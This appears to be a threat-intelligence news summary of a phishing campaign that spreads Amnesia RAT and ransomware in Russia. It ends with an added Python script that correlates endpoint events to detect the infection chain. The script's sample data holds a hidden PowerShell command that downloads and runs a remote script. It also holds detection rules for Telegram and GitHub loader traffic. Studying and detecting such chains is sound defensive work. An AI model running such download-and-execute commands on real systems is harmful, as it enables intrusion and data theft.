A new multi-stage phishing campaign has been observed targeting users in Russia with ransomware and a remote access trojan called Amnesia RAT, according to Fortinet FortiGuard Labs researcher Cara Lin.
The attack begins with social engineering lures delivered via business-themed documents that camouflage malware as routine tasks, with compressed archives containing decoy documents and a malicious LNK file that leads to a first-stage loader hosted on GitHub and ultimately to Amnesia RAT and Hakuna Matata-based ransomware.
The first-stage loader suppresses the PowerShell console, creates a decoy document, and notifies the attacker via the Telegram Bot API before a second-stage Visual Basic Script is run; the final payloads include Amnesia RAT, capable of broad data theft, and ransomware that encrypts various file types after disabling Defender components.
The campaign uses multiple public cloud services to distribute payloads and leverages defendnot to disable Microsoft Defender, while later stages perform environment reconnaissance, take screenshots, exfiltrate data over Telegram, and deploy WinLocker to restrict user interaction.
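As an added example, not code from the Fortinet report, the script below correlates constructed endpoint events per host to surface the chain described above: a hidden PowerShell console spawned from the LNK, a loader fetched from GitHub, contact with the Telegram Bot API, and a second-stage VBS launched by PowerShell. The event schema, field names and sample records are assumptions made for this illustration; any one indicator alone is noisy, which is why the example scores them together per host.

```python
"""Correlate weak per-event indicators into a per-host verdict for the
LNK -> hidden PowerShell -> GitHub loader -> Telegram -> VBS chain."""
import re

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
HIDDEN_PS = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
LOADER_HOSTS = {"raw.githubusercontent.com", "github.com", "objects.githubusercontent.com"}

# Constructed sample telemetry in a simplified Sysmon-like shape (assumed schema).
SAMPLE_EVENTS = [
    {"host": "ws01", "type": "process", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell.exe -WindowStyle Hidden -ep bypass -c "iwr https://raw.githubusercontent.com/x/y/s.ps1 | iex"'},
    {"host": "ws01", "type": "network", "image": "powershell.exe", "dest": "raw.githubusercontent.com"},
    {"host": "ws01", "type": "network", "image": "powershell.exe", "dest": "api.telegram.org"},
    {"host": "ws01", "type": "process", "parent": "powershell.exe", "image": "wscript.exe",
     "cmdline": "wscript.exe C:\\Users\\u\\AppData\\Local\\Temp\\stage2.vbs"},
    # Benign admin script on another host: visible console, local file, no network.
    {"host": "ws02", "type": "process", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
]


def indicators(ev):
    """Return the set of chain stages a single event matches (usually zero or one)."""
    found = set()
    image = ev.get("image", "").lower()
    cmd = ev.get("cmdline", "")
    if ev["type"] == "process":
        if image in POWERSHELL and HIDDEN_PS.search(cmd):
            found.add("hidden_powershell")  # console suppressed, as the loader does
        if (image in {"wscript.exe", "cscript.exe"}
                and ev.get("parent", "").lower() in POWERSHELL
                and cmd.lower().endswith(".vbs")):
            found.add("vbs_stage_from_powershell")
    elif ev["type"] == "network" and image in SCRIPT_HOSTS:
        dest = ev.get("dest", "").lower()
        if dest in LOADER_HOSTS:
            found.add("script_host_to_github")
        if dest == "api.telegram.org":
            found.add("script_host_to_telegram_api")
    return found


def correlate(events):
    """Union the indicators seen on each host; several together are the chain."""
    per_host = {}
    for ev in events:
        per_host.setdefault(ev["host"], set()).update(indicators(ev))
    return per_host


def flag_hosts(events, threshold=3):
    """Hosts matching at least `threshold` distinct stages of the chain."""
    return sorted(h for h, inds in correlate(events).items() if len(inds) >= threshold)
```

Running `flag_hosts(SAMPLE_EVENTS)` returns `['ws01']`; the host running a visible, local backup script matches nothing.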
Separately, the report notes deployments linked to UNG0902 and a campaign codenamed Operation DupeHike against Russian entities, with DUPERUNNER and AdaptixC2 beacons, and notes reporting on Paper Werewolf as another actor active in recent months.